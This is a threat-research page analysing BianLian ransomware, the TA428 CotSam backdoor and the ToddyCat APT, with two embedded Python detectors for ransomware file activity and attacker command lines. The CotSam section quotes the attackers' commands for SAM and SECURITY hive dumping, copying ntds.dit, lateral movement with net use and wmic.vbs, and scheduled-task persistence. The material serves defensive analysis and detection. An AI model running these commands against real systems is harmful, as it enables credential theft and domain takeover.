
Phishing

Twilio

EvilProxy


EvilProxy: Scaling Phishing Attacks Keeping MFA At Bay

EvilProxy operators leverage Reverse Proxy & Cookie Injection methods to evade MFA – proxyfying victim’s session...

  21-Sep-2022
 7 min read

Related Articles


Golang

BianLian

Ransomware

Increases in the command and control infrastructure of the new cross-platform ra...

Secure Blink threat researchers have observed that Golang-based malware has grown in prominence, most likely due to its cross-platform functionalities and the fact that it makes reverse engineering even more complex. Threats developed using the Go language include ransomware, RATs, stealers, and others.

The BianLian ransomware has targeted many well-known organizations (9 victims so far) across several industry sectors such as Manufacturing, Education, Healthcare, BFSI, etc. across Australia, North America, and the United Kingdom, primarily targeting SonicWall VPN devices and the Microsoft Exchange Server ProxyShell vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).

## Attack Flow

The ransomware group first exploits the ProxyShell flaws to obtain access and then installs a web shell or ngrok payload to monitor the victim's activity. According to analysts, the gang has taken precautions to avoid detection and minimize observable events as it searches for data and selects machines to encrypt.

According to the paper, BianLian deployed typical _"living off the land"_ (LoL) techniques for network profiling and lateral movement. These included net.exe for adding and/or modifying user rights, netsh.exe for configuring host firewall policies, and reg.exe for modifying remote desktop and security policy enforcement registry settings.

In addition to utilizing LoL techniques, the group is also known to deploy a bespoke implant as an additional method for sustaining constant network access. This _"simple but effective"_ backdoor's primary purpose is to retrieve arbitrary payloads from a remote server, load them into memory, and then execute them. According to the assessment, BianLian has demonstrated proficiency with lateral movement techniques, altering its operations based on the network's capabilities and defenses.
BianLian, like other new cross-platform ransomware such as Agenda, Monster, and RedAlert, is capable of starting servers in Windows Safe Mode to execute its file-encrypting malware while evading detection by system-installed security solutions. In addition to deleting snapshots, removing backups, and running its Golang encryption module via Windows Remote Management (WinRM) and PowerShell scripts, additional methods were taken to evade security obstacles.

The group's emergence contributes to the expanding number of threats utilizing Golang as a base language, which enables adversaries to make rapid modifications to a single code base that can subsequently be built for various platforms.

In the figure below, we have prepared a breakdown of the industries targeted by the BianLian ransomware.

![Fig 1 Top Industries Targeted By BianLian.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Fig_1_Top_Industries_Targeted_By_Bian_Lian_0ff434142a.jpg)

***Figure 1 – Industries Targeted by the BianLian Ransomware***

## Technical Analysis

For this evaluation, we used the hash of the 64-bit GoLang binary executable `eaf5e26c5e73f3db82cd07ea45e4d244ccb3ec3397ab5263a1a74add7bbcb6e2 (SHA256)`.

Below is the unique build ID of the GoLang ransomware.

![Figure-2-Go-Build-ID.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_2_Go_Build_ID_59c0dc90f7.jpg)

***Figure 2 – Go Build Identifier***

When the ransomware is executed, it looks up the `wine_get_version()` function using the GetProcAddress() API to see if the file is operating in a WINE environment.

![Figure-3-Anti-analysis-Technique.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_3_Anti_analysis_Technique_2a561317e6.jpg)

***Figure 3 – Anti-analysis Technique***

After that, the ransomware uses the CreateThread() API call to generate numerous threads in order to encrypt files more quickly, making it more challenging to reverse engineer the malware. The diagram below depicts the many threads produced by the ransomware.
![Figure-4-Multiple-Thread-Creation.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_4_Multiple_Thread_Creation_e229ce428e.jpg)

***Figure 4 - Creation of Multiple Threads***

Using the GetDriveTypeW() API function, the malware then identifies the system drives (from A: to Z:) and encrypts all files available on the associated devices. The malware then drops a ransom note with the filename "Look at these instructions.txt" in various folders. The ransomware generates a notice with the following content.

![Figure-5-Malware-Writing-Ransom-Notes(1).jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_5_Malware_Writing_Ransom_Notes_1_c0696f0499.jpg)

***Figure 5 - Depicts malware composing ransom notes***

After dropping the ransom message, the malware enumerates files and directories using the FindFirstFileW() and FindNextFileW() API calls to search for files to encrypt. The following file extensions and file/folder names are exempt from encryption by the ransomware:

To encrypt files on the victim's system, the ransomware uses GoLang packages including crypto/cipher, crypto/aes, and crypto/rsa.

![Figure-6-Hardcoded-Strings-of-Crypto-GoLang-Packages.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_6_Hardcoded_Strings_of_Crypto_Go_Lang_Packages_d010aaa382.jpg)

***Figure 6- Hardcoded "Crypto" Strings in GoLang Packages***

The malware separates the file's contents into 10-byte chunks for encryption purposes. It first takes 10 bytes from the source file, encrypts them, and then writes the encrypted data to the destination file. Slicing the data into small pieces is a way to avoid detection by anti-virus software. The image below depicts the code fragment of the encryption loop as well as the original and infected file contents prior to and after encryption.
![Figure-7-Encryption-routine-and-OriginalEncrypted-file-content(1).jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_7_Encryption_routine_and_Original_Encrypted_file_content_1_1f64c44f2e.jpg)

***Figure 7 – Encryption algorithm and original/encrypted file content***

As demonstrated below, the malware then renames the encrypted files with the ".bianlian" extension and uses them to replace the original files via the MoveFileExW() API function.

![Figure-8-MoveFileExW-API.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_8_Move_File_Ex_W_API_ad5aeb0ba6.jpg)

***Figure 8 - MoveFileExW() API***

Using the following command line, the ransomware deletes itself, leaving just the encrypted files and the ransom notice on the victim's computer.

`cmd /c del C:UsersAdmin>Desktopnew one.exe`

The image below depicts the BianLian ransomware encrypted files and ransom note text file after a victim's computer has been successfully infected.

![Figure-9-Files-encrypted-by-BianLian-Ransomware.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_9_Files_encrypted_by_Bian_Lian_Ransomware_1902703a73.jpg)

***Figure 9 - BianLian ransomware-encrypted files***

In the ransom note, victims are instructed on how to contact the threat actors in order to get their encrypted files restored. The threat actors state that the victims' sensitive information, including financial, client, company, technical, and personal files, has been downloaded, and they threaten to upload it to their leak site if the ransom is not paid within ten days. The ransom message also includes the TOX Messenger ID for ransom discussions as well as the Onion URL of the leak site page, as depicted in the figure below.

![Figure-10-Ransom-note.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_10_Ransom_note_c41d6ad983.jpg)

***Figure 10 – Ransom note***

The image below depicts the BianLian ransomware Onion leak homepage and the extortion items of the affected company.
![Figure-11-BianLian-Leak-site-home-page.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_11_Bian_Lian_Leak_site_home_page_e500fded0f.jpg)

***Figure 11 -The homepage of the BianLian Leak website is depicted***

The BianLian Leak website offers a list of all firms hit by the ransomware and the contact information for the TA for ransomware data recovery.

![Figure-12-BianLian-Leak-site-affected-companies-list-TAs-contact-details.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_12_Bian_Lian_Leak_site_affected_companies_list_T_As_contact_details_95d66ee6b9.jpg)

***Figure 12 - List of BianLian Leak site affected companies and contact information for threat actors***

## Conclusion

Organizational efficiency and security are two areas that are being negatively impacted by the rise of ransomware as an attack vector. BianLian is a GoLang-based malware that has infiltrated several businesses and is demanding astronomical sums in return for decryption keys. The threat actors use a double extortion strategy, taking data from the victimized company and then publishing it online if the ransom is not paid in a timely fashion.

Threat actors choose to create their ransomware in GoLang because, among other reasons, it allows a single codebase to be compiled for all major operating systems. The threat actors in charge of BianLian are constantly adapting and expanding their toolset so as to remain undetected. Secure Blink will keep an eye out for BianLian and similar ransomware gangs and evaluate their actions to learn more about their goals.
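The file-system behaviour described in the technical analysis (the "Look at these instructions.txt" note dropped in several folders, then files renamed to `.bianlian`) can be checked for in file-event telemetry. The following is an added example, not code from the original article or from Secure Blink; the pipe-delimited event format, the sample events and the thresholds are constructed assumptions.

```python
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

# Artifacts named in the write-up (compared case-insensitively).
RANSOM_NOTE = "look at these instructions.txt"
ENCRYPTED_EXT = ".bianlian"

# Thresholds are assumptions for illustration; tune them against real telemetry.
WINDOW = timedelta(seconds=60)
MIN_RENAMES = 3
MIN_NOTE_DIRS = 2

# Constructed sample events: timestamp|process id|action|path (new name for renames).
SAMPLE_EVENTS = [
    r"2022-09-16T10:00:00|4120|create|C:\Users\alice\Documents\Look at these instructions.txt",
    r"2022-09-16T10:00:01|4120|rename|C:\Users\alice\Documents\budget.xlsx.bianlian",
    r"2022-09-16T10:00:02|4120|rename|C:\Users\alice\Documents\plan.docx.bianlian",
    r"2022-09-16T10:00:03|4120|create|C:\Users\alice\Pictures\Look at these instructions.txt",
    r"2022-09-16T10:00:04|4120|rename|C:\Users\alice\Pictures\site.jpg.bianlian",
    r"2022-09-16T10:00:05|812|rename|C:\Users\bob\Desktop\notes-final.txt",
    r"2022-09-16T10:05:00|977|rename|C:\Temp\sample.bianlian",
]


def parse_event(line):
    """Split one constructed event line into typed fields."""
    ts, pid, action, path = line.split("|", 3)
    return datetime.fromisoformat(ts), int(pid), action, path


def detect_bianlian_activity(lines):
    """Alert on a process that drops the note in several folders and
    renames several files to .bianlian inside one time window."""
    per_pid = defaultdict(list)
    for line in lines:
        ts, pid, action, path = parse_event(line)
        folder, name = ntpath.split(path.lower())
        if action == "rename" and name.endswith(ENCRYPTED_EXT):
            per_pid[pid].append((ts, "rename", folder))
        elif action == "create" and name == RANSOM_NOTE:
            per_pid[pid].append((ts, "note", folder))

    alerts = []
    for pid in sorted(per_pid):
        events = sorted(per_pid[pid])
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most WINDOW.
            while events[end][0] - events[start][0] > WINDOW:
                start += 1
            window = events[start:end + 1]
            renames = sum(1 for _, kind, _ in window if kind == "rename")
            note_dirs = {folder for _, kind, folder in window if kind == "note"}
            if renames >= MIN_RENAMES and len(note_dirs) >= MIN_NOTE_DIRS:
                alerts.append({"pid": pid, "first_seen": window[0][0],
                               "renames": renames, "note_dirs": len(note_dirs)})
                break  # one alert per process is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_bianlian_activity(SAMPLE_EVENTS):
        print(alert)
```

A single `.bianlian` rename (process 977 in the sample) stays below the thresholds, so one stray file with that extension does not raise an alert on its own.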

  16-Sep-2022
  1 min read

APT

Backdoor

TA428

CotSam: a never seen before malware strain involved in the targeted attacks acro...

In the course of our threat research, we have discovered a new backdoor that differs from every other one utilized in attacks that researchers have linked to TA428. We chose to call the malware Backdoor because of its resemblance to the Cotx backdoor. Win32.team.

The attackers employed two techniques for deploying the malware while building the attack. In the first instance, the malware was sent along with a vulnerable version of Microsoft Word. For 32-bit computers, Microsoft Word 2007 was employed, and for 64-bit platforms, Microsoft Word 2010. After WINWORD.EXE was launched, a DLL hijacking vulnerability was used to pass control to the malicious library wwlib.dll, which used a straightforward XOR operation with the key 0xAA to decrypt the file OEMPRINT.CAT from the current directory.

![TR1.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_1_e97461df8e.jpg)

The decrypted executable file is then written directly to the memory of the svchost.exe process using the WriteProcessMemory function.

In the second instance, the attackers took advantage of the applaunch.exe program's DLL hijacking vulnerability (`MD5: 170D73BE3FE846E9070CFAE530F5A31C`). It's important to note that other Chinese organizations had previously disseminated ShadowPad malware using the identical version of applaunch.exe.

The backdoor extracts the proxy server's parameters from the registry value `HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer`, then connects to the CnC server and waits for commands.

### Lateral Movement

After taking control of the initial system, the attackers attempt to distribute the malware to further computers connected to the workplace network. The attackers' goal at this stage is to get access to the domain controller and take complete control of the infrastructure of the company being attacked. The attackers use a remote shell supplied by the backdoor malware to launch their tools and retrieve operation results.
In the course of our investigation, we discovered a number of hand-entered commands that the attackers executed on infected systems (this is indicated both by the time intervals between commands and by the output of results not being redirected anywhere except standard output).

The majority of the attacks were performed using the NBTscan console tool, which was downloaded to victims' PCs as a .cab archive called ace.cab and unpacked using the expand system tool:

`expand.exe ace.cab ace.exe`

`ace -n 172.22.0.0/16`

We also saw the employment of the Ladon hacking framework in a few instances. The framework is made up of a variety of modules with various lateral movement functionality, such as:

- Scanning the network and finding different types of devices.
- Identifying and exploiting vulnerabilities in the devices found.
- Cracking passwords for resources on the network.
- Scanning for password hashes.
- Scanning for passwords in text files.
- Remotely executing arbitrary code.

![TR2.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_2_6ec25456fe.jpg)

With these tools, the attackers can scan the whole network architecture and discover the systems most exposed to attack.

Additionally, the attackers gathered data about system users and their network connections. They were particularly interested in RDP connections:

`query user`

`net user`

`net group`

`ipconfig /all`

`netstat -no`

`netstat -no | findstr 3389`

`netstat -ano | findstr 2589`

### Distribution of Malware

Using the results of network scanning and user credentials that they had already obtained, the attackers were able to spread their infection from one system to the next.
They utilized the net use and xcopy programs to connect to remote systems and install malware on those systems:

`net use \\[IP address]\IPC$ "[password]" /u:"[user name]"`

`xcopy.exe /s \\[IP address]\c$\windows\web\*" $windir\Web\ /y /e /i /q`

An open-source VBS script called wmic.vbs was occasionally used to deliver malware, and the attackers also downloaded it to remote systems:

`cscript.exe //nologo wmic.vbs /cmd [IP address] [user name][password] $appdata\ABBYY\Install.exe`

Although the VBS script was initially created as a penetration testing tool, threat actors frequently employ it in actual attacks. The script wmic.vbs uses WMIC (Windows Management Instrumentation Command-line) to run commands under a user account with administrative rights.

In other instances, the attackers used Windows Task Scheduler to create a task that ensured the malware launched automatically:

`schtasks /create /tn CacheTasks /tr “$appdata\ABBYY\FineReader\WINWORD.EXE” /sc minute /mo 50 /ru “” /f`

Attackers who were able to access closed networks (networks not directly connected to the internet) turned intermediate systems (systems accessible from closed networks while also being connected to the internet) into proxy servers. This made it possible for malware running on computers connected to closed networks to communicate with its CnC servers. In this scenario, configuring network traffic redirection was a simple process that could be completed with built-in Windows tools:

`netsh interface portproxy add v4tov4 2589 <IP address> 443`

### Domain Hijacking

After taking control of the domain controller, the attackers took the whole database of Active Directory user password hashes.
To do this, they first used a unique cmd command to store a copy of the system registry hives:

`reg save HKLM\SAM sam.save`

`reg save HKLM\SECURITY security.save`

Following that, they copied the ntds.dit file, which houses the Active Directory database and user password hashes. The system constantly uses the file ntds.dit and prevents ordinary copying tools from working on it. The attackers circumvented this restriction by employing a specific tool made to copy the file via the Windows Volume Shadow Copy Service (VSS).

![TR3.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_3_2456e3d8ab.jpg)

An example of a command launching the utility is shown below:

`c:\programdata\microsoft\sc64.exe c:\windows\ntds\ntds.dit` `c:\programdata\microsoft\ntds.dit`

The attackers acquired logins and password hashes for each user on the domain by using the system registry's contents and the file ntds.dit. The attackers next utilized hash cracking to obtain the login credentials for the majority of users from the domain of the attacked company.

In circumstances where an attacked organization's IT architecture had many domains, the attackers examined trust relationships between the domains to locate accounts that allowed them to move laterally:

`nltest /domain_trusts`

By gaining access to a domain controller, the attackers obtained, among other things, the password hash for the user krbtgt (an Active Directory service account), allowing them to launch the Golden Ticket attack. It permitted them to independently issue Kerberos tickets (TGT) and authenticate to any Active Directory service for an unlimited period of time.

In one of the cases examined, the security team of the attacked firm noticed unusual activity on the domain controller and, as a result, changed the passwords of users whose accounts had been compromised. However, the attackers proceeded to use Kerberos tickets to act without incident on behalf of these accounts.
This demonstrates that traditional incident response techniques are ineffective in the event of a Golden Ticket attack.

Last but not least, it's important to remember that in one of the incidents, the attackers were also successful in gaining access to the server hosting the system that manages security solutions and remotely changing the settings of the endpoint security products the company was using.

The findings derived from this [threat research](https://www.secureblink.com/threat-research) demonstrate that spear phishing is still one of the most important risks to commercial companies and government institutions. The majority of the malware employed by the attackers consists of known backdoor software, along with common lateral movement strategies and antivirus solution evasion techniques. The attackers were able to access dozens of businesses simultaneously and even take over the complete IT infrastructure and IT security measures of some of the targeted firms.

The attack series we have identified is not the first in the campaign, and given the attackers' level of success, we think it is quite probable that they will carry out other attacks along these lines in the future. Public and private organizations should implement comprehensive efforts to deter such attacks.
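The hand-entered commands quoted in this write-up are distinctive enough to hunt for in process-creation logs. The following is an added example, not code from the original article or from Secure Blink: the patterns are derived only from the command lines quoted above, while the rule names, the severity rule, and the sample hosts, accounts and addresses are constructed assumptions.

```python
import re
from collections import defaultdict

# (section of the write-up, rule name, pattern). Rule names are this example's own.
RULES = [(stage, name, re.compile(rx, re.IGNORECASE)) for stage, name, rx in [
    ("lateral movement", "cab unpacked to exe with expand",
     r"\bexpand(\.exe)?\s+\S+\.cab\s+\S+\.exe\b"),
    ("lateral movement", "netstat filtered for port 3389 or 2589",
     r"\bnetstat(\.exe)?\s+-\w+\s*\|\s*findstr(\.exe)?\s+(3389|2589)\b"),
    ("distribution", "IPC$ logon with inline password",
     r"\bnet(\.exe)?\s+use\s+\\\\\S+\\ipc\$\s+\S+\s+/u:"),
    ("distribution", "wmic.vbs remote execution",
     r"\bcscript(\.exe)?\s+.*\bwmic\.vbs\s+/cmd\b"),
    ("distribution", "scheduled task on a minute schedule",
     r"\bschtasks(\.exe)?\s+/create\b.*\s/sc\s+minute\b"),
    ("distribution", "netsh port proxy relay",
     r"\bnetsh(\.exe)?\s+interface\s+portproxy\s+add\s+v4tov4\b"),
    ("domain hijacking", "registry hive saved",
     r"\breg(\.exe)?\s+save\s+hklm\\(sam|security)\b"),
    ("domain hijacking", "ntds.dit on command line", r"\bntds\.dit\b"),
    ("domain hijacking", "domain trust enumeration",
     r"\bnltest(\.exe)?\s+/domain_trusts\b"),
]]

# Constructed sample process-creation events: (host, command line).
SAMPLE_EVENTS = [
    ("WS-014", r"expand.exe ace.cab ace.exe"),
    ("WS-014", r"ace -n 172.22.0.0/16"),
    ("WS-014", r'net use \\10.0.5.20\IPC$ "<redacted>" /u:"CORP\svc_backup"'),
    ("WS-014", r'schtasks /create /tn CacheTasks /tr "C:\Users\carol\AppData\Roaming'
               r'\ABBYY\FineReader\WINWORD.EXE" /sc minute /mo 50 /ru "" /f'),
    ("DC-01", r"reg save HKLM\SAM sam.save"),
    ("DC-01", r"reg save HKLM\SECURITY security.save"),
    ("DC-01", r"c:\programdata\microsoft\sc64.exe c:\windows\ntds\ntds.dit "
              r"c:\programdata\microsoft\ntds.dit"),
    ("DC-01", r"nltest /domain_trusts"),
    ("HELPDESK-03", r"nltest /domain_trusts"),
    ("WS-077", r"netstat -ano"),
    ("WS-077", r"ipconfig /all"),
]


def match_rules(command_line):
    """Return (stage, rule name) for every rule the command line matches."""
    return [(stage, name) for stage, name, rx in RULES if rx.search(command_line)]


def triage(events, min_rules=2):
    """Group hits per host. One rule is a lead to review; several different
    rules on the same host is the pattern the write-up describes."""
    hits = defaultdict(list)
    for host, command_line in events:
        for stage, name in match_rules(command_line):
            hits[host].append((stage, name))
    report = []
    for host in sorted(hits):
        rules = sorted({name for _, name in hits[host]})
        stages = sorted({stage for stage, _ in hits[host]})
        severity = "high" if len(rules) >= min_rules else "review"
        report.append({"host": host, "rules": rules,
                       "stages": stages, "severity": severity})
    return report


if __name__ == "__main__":
    for entry in triage(SAMPLE_EVENTS):
        print(entry["severity"], entry["host"], entry["rules"])
```

Commands that administrators also run daily (`ipconfig /all`, plain `netstat -ano`) are deliberately left without rules, so WS-077 produces no entry.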

  09-Aug-2022
  1 min read

APT

A new APT group, tracked as ToddyCat, to a series of attacks targeting entities ...

ToddyCat APT is a Chinese-speaking threat group involved in an ongoing cyberespionage campaign primarily targeting government and military sectors across Europe and Asia, with a key focus on compromising multiple Microsoft Exchange servers using two malicious programs: the Samurai backdoor and the Ninja Trojan.

It is considered a fairly new, sophisticated APT group, even though it was spotted for the first time back in December 2020, when it launched several attacks against the targets' Microsoft Exchange servers. ToddyCat then began to take advantage of the [ProxyLogon vulnerability on Microsoft Exchange Servers](https://www.secureblink.com/cyber-security-news/proxylogon-patching-frenzy-in-microsoft-exchange-servers) to infiltrate various enterprises across Europe and Asia, with a steady rise in February-March 2021. In September 2021, the APT group concentrated its focus on the systems used by Asian diplomatic and governmental organizations. The group keeps its armament up to date and continues to launch assaults in 2022.

Although the primary infection vector for the most recent activity is unknown, the researchers have thoroughly examined the malware employed in the operations. ToddyCat uses the advanced cyberespionage tools Samurai Backdoor and Ninja Trojan, which may sneak into targeted networks and remain undetected for extended periods of time.

Samurai, the last stage of the assault, is a modular backdoor that enables the attacker to control the remote system and move laterally within the infected network. This malware stands out because it jumps between instructions using various control flow and case statements, which makes it difficult to follow the sequence of events in the code. Additionally, it is used to launch the Ninja Trojan, a sophisticated tool that enables several users to operate on the same machine at once.

Ninja Trojan offers a broad range of commands as well, enabling attackers to manage distant computers covertly.
It is often launched by a variety of loaders after being loaded into a device's memory. Before fully infiltrating a vulnerable network, the Ninja Trojan begins the operation by obtaining configuration parameters from the encrypted payload. The malware's capabilities, which may be dynamically modified using a specific command, include manipulating file systems, launching reverse shells, forwarding TCP packets, and even seizing control of the network for specified periods of time.

The malware also shares similarities with other well-known post-exploitation frameworks, such as [CobaltStrike](https://bit.ly/3tbOxSN), but Ninja has additional capabilities that allow it to restrict the number of direct connections from the targeted network to the remote command and control systems without internet access. Additionally, it has the ability to alter HTTP header and URL paths in order to hide dangerous traffic in HTTP requests and manage HTTP indicators. Ninja Trojan is especially covert thanks to these abilities.

"ToddyCat is a highly skilled threat actor with advanced technological abilities who can slip past security measures and infiltrate elite organizations. We still lack total visibility into their operations and strategies despite the amount of loaders and attacks that have been identified over the past year. A further remarkable feature of ToddyCat is its emphasis on advanced malware capabilities. Ninja Trojan earned its name because it is difficult to detect and, thus, difficult to eradicate. Using multi-layer defenses that offer information on internal assets and keep abreast of the most recent threat intelligence is the best approach to deal with this type of danger," according to Giampaolo Dedola, a security expert at Kaspersky.

From February 26 until the beginning of March, we saw a rapid escalation and the attacker taking advantage of the ProxyLogon vulnerability to target numerous businesses in Europe and Asia.
In December 2020, the organization began using the Microsoft Exchange vulnerability, but there wasn't enough data to confirm the theory. In any event, it's important to note that all of the targeted devices attacked between December and February were Microsoft Windows Exchange servers, which were infected using an unknown exploit and the same attack chain as that employed in March.

In the first round of attacks, only Microsoft Exchange Servers were targeted. These servers had been infected with Samurai, a sophisticated passive backdoor that typically operates on ports 80 and 443. The malware allows for the execution of arbitrary C# code and is combined with a number of modules that let the attacker control the remote system and move laterally throughout the targeted network.

In some specific instances, the Samurai backdoor was also used to run a more sophisticated malicious program that we called Ninja. This tool is possibly part of a post-exploitation toolkit used only by ToddyCat. The logic of the code suggests that Ninja is a collaborative tool that enables numerous operators to operate the same machine at once. It offers a broad range of commands that let attackers take control of distant computers, evade detection, and penetrate deep inside a target network.

Some of the features are comparable to those offered by other well-known post-exploitation toolkits. For instance, Ninja has a capability similar to Cobalt Strike pivot listeners that can restrict the number of direct connections from the targeted network to the remote C2 and control systems without internet access. By altering HTTP header and URL paths, it also offers the capability of controlling HTTP indicators and hiding malicious traffic in HTTP requests that appear legitimate. This feature has elements that bring to mind the Malleable C2 profile from Cobalt Strike.
Since its initial appearance in December 2020, ToddyCat has continued to be quite active, particularly in Asia, where we have found numerous other variants of loaders and installers that are used to load malware like Samurai and Ninja. Other waves of attacks against desktop computers that had been infected by malicious loaders sent via Telegram were also seen.

ToddyCat is a sophisticated APT group equipped with multiple techniques to evade detection, and it manages to maintain a low profile. Throughout the entire investigation, multiple samples were discovered; however, despite the number of files and the duration of their activities, the attacks could not be attributed to a known group.

  25-Jun-2022
  1 min read